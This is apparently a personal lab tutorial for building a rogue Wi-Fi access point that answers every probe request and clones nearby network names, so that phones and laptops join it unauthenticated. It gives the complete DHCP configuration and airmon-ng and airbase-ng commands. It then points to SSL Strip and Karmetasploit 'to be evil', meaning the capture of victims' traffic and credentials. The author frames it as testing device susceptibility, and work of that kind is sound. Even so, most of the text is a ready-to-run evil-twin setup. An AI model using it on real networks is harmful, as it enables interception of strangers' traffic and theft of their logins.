Clone Wifi access points

The purpose of this tutorial was to create a fake access point in my lab which clone-s all accessible wifi networks in the area without the authentication in order to tets if different devices (windows, android, linux) are willing to join to a malicious wifi access point and wether they are vulnerable or not.

I used my Lenovo x230 notebook with the built-in wifi card as I did not want to get innocent people from outside my apartment to be able to join my network. I could have used mac address filtering as well, but did not want to waste time with that. I used Backtrack 5 R3 x64 Gnome operating system.

My fake AP IP address will be: 10.0.0.1

My network interface name is: wlan0

We need several things in order to perform the task:

  • Fake wifi access point
  • DHCP server to provide IP to the victims
  • metasploit to capture DNS requests and service connection attempts and respond with malicious content

Set up the DHCP server

Get the server package from repository, stop it after install, save a backup of original configuration and create our own config file:

apt-get install dhcp3-server
/etc/init.d/dhcpd stop
cd /etc/dhcp3/
cp dhcpd.conf dhcpd.conf.orig
nano /etc/dhcp3/dhcpd.conf

I also like to remove DHCP from autostart:

update-rc.d -f dhcp3-server remove

Put the following contents into the file:

option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
 
ddns-update-style none;
 
authoritative;
 
log-facility local7;
 
subnet 10.0.0.0 netmask 255.255.255.0 {
    range 10.0.0.100 10.0.0.254;
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.255;
    option routers 10.0.0.1;
    option domain-name-servers 10.0.0.1;
}

Now we are ready to go. First we need to restart our wireless adapter in monitor mode. To do so, we first stop the interface, then use airmon-ng to restart it in monitor mode. Then, we utilize airbase-ng to start a new network. 

airmon-ng
airmon-ng start wlan0
airbase-ng -P -C 30 -e "FreeWifi" -v mon0

-P  = Respond to all probes
- C 30 = enable beaconing of probed ESSID values (in seconds)
--essid = specify a single (initial) ESSID
-v = verbose
mon0 = Our virtual monitor mode interface

Airbase-ng creates an interface named "at0" tap so you have to configure it and set the mtu size.

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400

Now let's start the DHCP server:

dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.conf at0

You can check if the DHCP is running with the following command:

ps aux | grep dhcpd

Result should be something like this:

OUTPUT: dhcpd     2956  0.0  0.0  19632  3008 ?        Ss   11:00   0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf mon0

Now in a new window I like to see the leased IP addresses:

tail -f /var/log/messages|grep dhcpd

To be evil, follow the SSL Strip instructions:

SSL Strip

To be evil, follow the Karmetasploit instructions:

Karmetasploit - metasploit capture traffic